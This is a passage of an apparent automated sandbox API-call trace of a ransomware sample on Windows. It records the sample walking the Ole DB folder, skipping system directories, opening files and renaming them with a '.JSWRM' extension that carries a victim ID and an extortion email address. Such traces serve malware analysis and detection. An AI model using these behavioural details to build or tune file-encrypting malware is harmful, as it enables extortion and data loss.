hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0069.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0069.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.335] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9655155203132344) returned 0 [0069.335] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.335] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.335] CloseHandle (hObject=0xffffffff) returned 1 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0069.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0069.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0069.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0069.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.336] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0069.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0069.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0069.336] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x26f7, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="oledbvbs.inc", cAlternateFileName="")) returned 1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2=".") returned 1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="..") returned 1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="...") returned 1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="windows") returned -1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="recovery") returned -1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="perflogs") returned -1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="documents and settings") returned 1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="$RECYCLE.BIN") returned 1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="system volume information") returned -1 [0069.336] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="msocache") returned 1 [0069.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbvbs.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbvbs.inc", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledbvbs.inc", lpUsedDefaultChar=0x0) returned 12 [0069.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbvbs.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbvbs.inc", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledbvbs.inc", lpUsedDefaultChar=0x0) returned 12 [0069.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0069.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0069.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0069.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.337] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9659244012001264) returned 0 [0069.337] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.338] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.338] CloseHandle (hObject=0xffffffff) returned 1 [0069.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0069.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0069.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0069.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23fa98 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.338] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0069.338] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43c80ffc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43c80ffc, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43c80ffc, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="sqloledb.dll", cAlternateFileName="")) returned 1 [0069.338] lstrcmpiW (lpString1="sqloledb.dll", lpString2=".") returned 1 [0069.338] lstrcmpiW (lpString1="sqloledb.dll", lpString2="..") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="...") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="windows") returned -1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="recovery") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="perflogs") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="documents and settings") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="system volume information") returned -1 [0069.339] lstrcmpiW (lpString1="sqloledb.dll", lpString2="msocache") returned 1 [0069.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqloledb.dll", lpUsedDefaultChar=0x0) returned 12 [0069.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqloledb.dll", lpUsedDefaultChar=0x0) returned 12 [0069.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0069.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0069.339] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43c80ffc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43c80ffc, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43c80ffc, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="sqloledb.rll", cAlternateFileName="")) returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2=".") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="..") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="...") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="windows") returned -1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="recovery") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="perflogs") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="documents and settings") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="$RECYCLE.BIN") returned 1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="system volume information") returned -1 [0069.339] lstrcmpiW (lpString1="sqloledb.rll", lpString2="msocache") returned 1 [0069.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqloledb.rll", lpUsedDefaultChar=0x0) returned 12 [0069.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqloledb.rll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqloledb.rll", lpUsedDefaultChar=0x0) returned 12 [0069.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0069.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0069.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0069.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.349] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9665669283073496) returned 0 [0069.349] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.349] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.349] CloseHandle (hObject=0xffffffff) returned 1 [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0069.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0069.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0069.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.349] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0069.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0069.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0069.350] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4fa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="sqlxmlx.dll", cAlternateFileName="")) returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2=".") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="..") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="...") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="windows") returned -1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="recovery") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="perflogs") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="documents and settings") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="system volume information") returned -1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="msocache") returned 1 [0069.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlxmlx.dll", lpUsedDefaultChar=0x0) returned 11 [0069.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, 